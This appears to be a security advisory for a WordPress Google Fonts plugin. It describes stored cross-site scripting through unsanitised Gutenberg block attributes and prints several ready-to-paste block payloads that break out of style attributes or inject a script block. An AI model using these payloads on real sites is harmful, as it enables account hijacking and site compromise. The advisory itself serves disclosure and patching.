The plugin does not escape and sanitise some of its block settings, allowing users with as role as low as Contributor to perform Stored Cross-Site Scripting attacks via blockType (combined with content), align, color, variant and fontID argument of a Gutenberg block.
As a contributor, put the following code in a post/page while in Code Editor mode < 3.0.2 <!-- wp:olympus-google-fonts/google-fonts {"blockType":"h4","fontID":"0","variant":"400","content":"Hello, World!","color":"red;animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(1+origin)//"} /--> <!-- wp:olympus-google-fonts/google-fonts {"blockType":"h4","fontID":"0","variant":"400","align":"center;animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(2+origin)//","content":"Hello, World!"} /--> <!-- wp:olympus-google-fonts/google-fonts {"blockType":"h4","fontID":"Arial;animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(origin)//","variant":"400","content":"Hello, World!"} /--> <!-- wp:olympus-google-fonts/google-fonts {"blockType":"h4","fontID":"Arial","variant":"400;animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(/Variant/)//","content":"Hello, World!"} /--> < 3.0.3 <!-- wp:olympus-google-fonts/google-fonts {"blockType":"script","fontID":"0","variant":"400","content":"alert(\u0022xss\u0022)"} /-->
apple502j
apple502j
Yes
2021-08-23 (about 1 years ago)
2021-08-23 (about 1 years ago)
2022-03-07 (about 1 years ago)